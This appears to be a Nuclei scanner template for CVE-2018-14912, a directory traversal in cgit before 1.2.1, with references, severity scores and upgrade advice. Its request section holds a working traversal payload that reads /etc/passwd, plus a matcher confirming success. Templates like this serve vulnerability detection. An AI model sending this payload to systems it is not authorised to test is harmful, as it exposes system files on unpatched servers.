id: CVE-2018-14912 info: name: cgit < 1.2.1 - Directory Traversal author: 0x_Akoko severity: high description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. remediation: | Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018080034 - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14912 cwe-id: CWE-22 epss-score: 0.96633 epss-percentile: 0.99528 cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cgit_project product: cgit tags: cve,cve2018,cgit,lfi http: - method: GET path: - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4a0a0047304502202da50d210fb9491e168b824b8eb24f6dd465d9c0094bf907dc8a729ab35a6ed7022100bb3c909083a6ef0632490df531d40a6f933b293a95ec5552b500d543e8d7e6ec:922c64590222798bb761d5b6d8e72950